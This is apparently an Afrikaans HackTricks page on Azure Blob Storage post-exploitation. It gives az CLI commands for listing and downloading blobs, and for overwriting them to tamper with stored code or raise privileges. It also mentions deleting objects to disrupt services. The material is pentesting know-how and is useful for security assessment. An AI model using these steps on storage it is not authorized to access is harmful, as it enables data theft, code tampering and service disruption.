1.5 KiB
Az - Blob Storage Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
Berg Privesc
Vir meer inligting oor berging, kyk:
{{#ref}} ../az-services/az-storage.md {{#endref}}
Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read
'n Hoofpersoon met hierdie toestemming sal in staat wees om die lys van die blobs (lêers) binne 'n houer te download en die lêers wat moontlik sensitiewe inligting bevat.
# e.g. Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read
az storage blob list \
--account-name <acc-name> \
--container-name <container-name> --auth-mode login
az storage blob download \
--account-name <acc-name> \
--container-name <container-name> \
-n file.txt --auth-mode login
Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write
'n Hoofpersoon met hierdie toestemming sal in staat wees om lêers in houers te skryf en te oorskryf wat hom mag toelaat om skade aan te rig of selfs bevoegdhede te verhoog (bv. om 'n bietjie kode wat in 'n blob gestoor is, te oorskryf):
# e.g. Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write
az storage blob upload \
--account-name <acc-name> \
--container-name <container-name> \
--file /tmp/up.txt --auth-mode login --overwrite
*/delete
Dit sal toelaat om voorwerpe binne die stoorrekening te verwyder wat dalk sekere dienste kan onderbreek of die kliënt waardevolle inligting kan laat verloor.
{{#include ../../../banners/hacktricks-training.md}}